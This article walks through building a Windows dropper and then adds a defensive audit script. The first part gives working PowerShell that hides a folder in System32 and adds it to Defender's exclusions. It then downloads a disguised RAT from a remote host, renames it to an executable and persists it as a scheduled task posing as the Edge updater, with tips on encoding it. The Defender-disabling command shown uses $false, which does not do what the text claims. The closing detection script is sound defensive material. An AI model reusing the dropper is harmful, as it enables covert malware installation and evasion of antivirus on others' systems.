Introduction
In this article, we'll see how to build a simple dropper that adds its own malware to Windows Defender's exclusion paths.
Scan-time and execution-time bypass
Manage Defender With PowerShell
For more information, see this link for a list of Defender-related PowerShell commands like the ones used here.
Can PowerShell Disable Windows Defender?
```powershell
Set-MpPreference -DisableRealtimeMonitoring $false
```
Yes, we can disable Defender with this command, but in practice it doesn't work: the attacker has to run it before launching the payload, and if we try to disable Defender through PowerShell, the registry or Group Policy, Defender recognises that pattern, prevents it from executing and raises an alert. So instead of disabling Defender, we add our own file, folder, drive, process, etc. to the exclusion paths and execute our malware from there.
Code
We use the Add-MpPreference or Set-MpPreference cmdlet to add the malware's location to Defender's exclusion paths. I changed the executable's extension from .exe to .png so that the RAT could be uploaded to the hosting server.
```powershell
$win_dir = $env:windir
$path = "exclusions"
# Stop if the hidden folder already exists (the script has already run once)
if (Test-Path -Path "$win_dir\system32\$path") {
break
}
else {
# Create the folder under System32 and hide it (hidden, system, read-only attributes)
mkdir -Path "$win_dir\system32\" -Name $path -Force
attrib +h +s +r "$win_dir\system32\$path"
# Exclude the folder from Defender scanning
add-MpPreference -ExclusionPath "$win_dir\system32\$path"
# Download the renamed payload with BITS and restore its .exe extension
$url = "https://upload/files/c_das.png"
$dest = "$win_dir\system32\$path"
Start-BitsTransfer -Source $url -Destination $dest
Rename-Item -Path "$dest\c_das.png" -NewName "$dest\access.exe"
# Persist with a scheduled task whose name imitates the Edge updater, run at startup
$action = New-ScheduledTaskAction -Execute "$win_dir\system32\$path\access.exe"
$trigger = New-ScheduledTaskTrigger -AtStartup
Register-ScheduledTask -TaskName "MicrosoftEdgeUpdateTaskMachineUAS" -TaskPath "\" -Action $action -Trigger $trigger
Start-ScheduledTask -TaskName "MicrosoftEdgeUpdateTaskMachineUAS"
}
```
Nothing else is needed, but it is better to encode the script and convert it to an .exe that runs in the background (:
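Every step of the dropper above leaves a footprint an administrator can query: a new entry in Get-MpPreference's ExclusionPath, a hidden folder inside System32, a scheduled task that executes out of an excluded path under a name imitating the Edge updater, and a Defender configuration-change event (event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log) that records the exclusion being added. The audit script below is an added example, not part of the original article or the dropper; it assumes it is run from an elevated PowerShell session on a host with Defender installed, and it only reads state, changing nothing.

```powershell
# Added audit script (not from the original article): surfaces the artefacts the
# dropper leaves behind. Assumes an elevated session on a host running Defender.

$pref = Get-MpPreference

Write-Host "== Defender exclusions =="
foreach ($kind in 'ExclusionPath', 'ExclusionExtension', 'ExclusionProcess') {
    foreach ($item in @($pref.$kind)) {
        $flag = ''
        if ($kind -eq 'ExclusionPath') {
            # An excluded directory under %windir%\System32 is unusual; the
            # dropper creates exactly such a folder and hides it with attrib +h +s.
            if ($item -like "$env:windir\System32\*") { $flag += '  <-- inside System32' }
            if (Test-Path -LiteralPath $item) {
                $attr = (Get-Item -LiteralPath $item -Force).Attributes
                if (($attr -band [IO.FileAttributes]::Hidden) -ne 0) { $flag += '  <-- hidden' }
            }
        }
        "{0,-20} {1}{2}" -f $kind, $item, $flag
    }
}

Write-Host "`n== Scheduled tasks worth a second look =="
$exclusions = @($pref.ExclusionPath)
Get-ScheduledTask | ForEach-Object {
    $task = $_
    foreach ($action in $task.Actions) {
        $exe = $action.Execute
        if (-not $exe) { continue }
        $reasons = @()
        # Action binary lives inside a Defender-excluded path
        foreach ($ex in $exclusions) {
            if ($exe -like "$ex*") { $reasons += "runs from excluded path $ex" }
        }
        # Name imitates the Edge updater but the binary is not under Program Files
        if ($task.TaskName -like 'MicrosoftEdgeUpdate*' -and
            $exe -notlike "$env:ProgramFiles*" -and
            $exe -notlike "${env:ProgramFiles(x86)}*") {
            $reasons += 'Edge-updater name, binary outside Program Files'
        }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Task    = $task.TaskPath + $task.TaskName
                Execute = $exe
                Trigger = ($task.Triggers | ForEach-Object { $_.CimClass.CimClassName }) -join ','
                Reason  = $reasons -join '; '
            }
        }
    }
} | Format-Table -AutoSize

Write-Host "`n== Recent Defender configuration changes touching exclusions (event 5007) =="
Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-Windows Defender/Operational'
    Id      = 5007
} -MaxEvents 50 -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'Exclusions' } |
    Select-Object TimeCreated,
        @{ n = 'Change'; e = { (($_.Message -split "`n") | Where-Object { $_ -match 'value' }) -join ' | ' } }
```

Run it periodically or as a scheduled job and baseline the output on a clean build: a legitimate exclusion list rarely changes, so any new ExclusionPath entry, any hidden excluded folder, and any task whose binary sits in an excluded directory is a finding to investigate rather than noise. The 5007 events are the durable record; they survive even if the attacker later removes the exclusion with Remove-MpPreference, so forward that log to a SIEM rather than relying only on the live configuration.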